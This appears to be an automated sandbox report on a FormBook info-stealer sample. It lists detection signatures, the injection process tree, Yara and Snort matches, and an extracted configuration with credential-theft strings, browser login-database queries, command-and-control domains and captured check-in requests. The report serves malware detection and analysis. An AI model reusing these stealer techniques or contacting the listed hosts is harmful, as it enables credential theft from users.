Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report in.exe

Overview

General Information

Sample Name:in.exe
Analysis ID:339331
MD5:cc35be28c18578d43849919ac1025d5a
SHA1:60bcb41d5ef76af919c769fab88f53c6a623a83b
SHA256:0c9d116a854e274534015e3e8e8349687c0c17b01653723642aeee53aa39bfac
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • in.exe (PID: 6496 cmdline: 'C:\Users\user\Desktop\in.exe' MD5: CC35BE28C18578D43849919AC1025D5A)
    • in.exe (PID: 6548 cmdline: 'C:\Users\user\Desktop\in.exe' MD5: CC35BE28C18578D43849919AC1025D5A)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 6264 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 5916 cmdline: /c del 'C:\Users\user\Desktop\in.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d771", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d873", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x64d4c905", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d739f", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0120e8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01745", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "hrrecruitertraining.com", "pancakeroll.club", "equiposddl.com", "fab-9corporation.com", "seanformo.com", "fisika-uinam.com", "cheeseburgerpasta.com", "cherylkarlfineartist.com", "wunderprodukte.net", "3912699.com", "sanitizyo.com", "856381190.xyz", "aprobet42.xyz", "knutsfastigheter.com", "disalvospizzaitalian.com", "energysavingsolarpower.com", "oldwonderful.com", "se32688.com", "samkecollection.com", "colegioreynosa.com", "choujiushui.com", "njxgwxzx.com", "bairdexotics.com", "concur.design", "terrenosenofertaqueretaro.com", "demenageseul.com", "blvdabbey.com", "asghargloves.com", "livesoft.xyz", "dropdevil.com", "goldenhills-serpong.com", "haxb33.xyz", "splendid-nail.com", "indisburse.com", "indianapolishousepainter.com", "seak.xyz", "prohealth.today", "claudiarecom.com", "mariemenor.com", "surethingdesigns.com", "musesgirl.com", "hackmaninsurance.com", "partut.com", "smokeflake.com", "conhecimentovivo.science", "animalbiologics.com", "spontaneoushomeschooler.com", "thedailytrack.com", "zerofive100.com", "cyberfoxbat.com", "thepassvacation.com", "worldagroecologyalliance.com", "qsnlnntxg.icu", "destinationssc.com", "transparentnutritions.com", "millcreekimports.com", "cptdesignstudio.com", "isaacphotorestoration.com", "daxuangou.com", "redgumhomestead.com", "comsodigital.com", "sxweilan.com", "andrewsreadingjournal.com", "matchmakergenetics.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.besthandstool.icu/uds2/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.in.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.in.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.in.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        1.2.in.exe.2b50000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.in.exe.2b50000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: in.exeAvira: detected
          Found malware configurationShow sources
          Source: 2.2.in.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d771", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d873", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x64d4c905", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d739f", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0120e8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01745", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: in.exeVirustotal: Detection: 46%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: in.exeJoe Sandbox ML: detected
          Source: 2.2.in.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.in.exe.2b50000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: in.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: in.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: in.exe, 00000002.00000002.292671384.0000000001670000.00000040.00000001.sdmp
          Source: Binary string: netstat.pdb source: in.exe, 00000002.00000002.292671384.0000000001670000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: in.exe, 00000001.00000003.250116639.000000001ABB0000.00000004.00000001.sdmp, in.exe, 00000002.00000002.292914452.000000000179F000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.600753548.0000000002D5F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: in.exe, NETSTAT.EXE
          Source: C:\Users\user\Desktop\in.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\in.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49748 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49748 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49748 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49751 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49751 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49751 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49754 -> 94.23.162.163:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49754 -> 94.23.162.163:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49754 -> 94.23.162.163:80
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI HTTP/1.1Host: www.seak.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uds2/?Y4spQFW=G5yaYpuBg7XYabQFtGr/YwUbUG6Du4hspLJ6ti3LnsVJcslX7oGk4EUBP1FenotTMaF2IKx0Gw==&Ezu=VTChCL_ht2spUrI HTTP/1.1Host: www.cptdesignstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI HTTP/1.1Host: www.demenageseul.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI HTTP/1.1Host: www.concur.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: global trafficHTTP traffic detected: GET /uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI HTTP/1.1Host: www.seak.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uds2/?Y4spQFW=G5yaYpuBg7XYabQFtGr/YwUbUG6Du4hspLJ6ti3LnsVJcslX7oGk4EUBP1FenotTMaF2IKx0Gw==&Ezu=VTChCL_ht2spUrI HTTP/1.1Host: www.cptdesignstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI HTTP/1.1Host: www.demenageseul.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI HTTP/1.1Host: www.concur.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.seak.xyz
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.267490258.000000000686B000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
